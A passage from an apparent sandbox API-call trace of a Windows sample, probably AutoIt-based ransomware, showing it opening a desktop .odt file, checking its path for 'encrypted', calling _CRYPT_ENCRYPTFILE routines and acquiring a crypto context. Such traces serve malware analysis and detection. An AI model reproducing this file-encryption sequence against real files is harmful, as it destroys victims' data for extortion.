lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.608] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd78 [0029.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.608] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8imsmp9ndkok.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.608] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.609] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.609] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.609] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.609] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0029.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.609] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.609] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.609] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0029.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.609] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.610] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.610] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x337bc90, ftLastWriteTime.dwHighDateTime=0x1d5b870, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 0x7c20c0 [0029.611] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.611] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x337bc90, ftLastWriteTime.dwHighDateTime=0x1d5b870, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 0x7c20c0 [0029.611] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.611] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IMSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SMp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mp9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nDKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DKOk.odt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.612] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.612] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.612] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.612] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.613] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.613] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.613] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.613] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.613] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x337bc90, ftLastWriteTime.dwHighDateTime=0x1d5b870, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 0x7c2240 [0029.613] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.613] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.613] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.613] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.614] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.614] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.614] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.614] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.614] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0029.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.614] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0029.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, 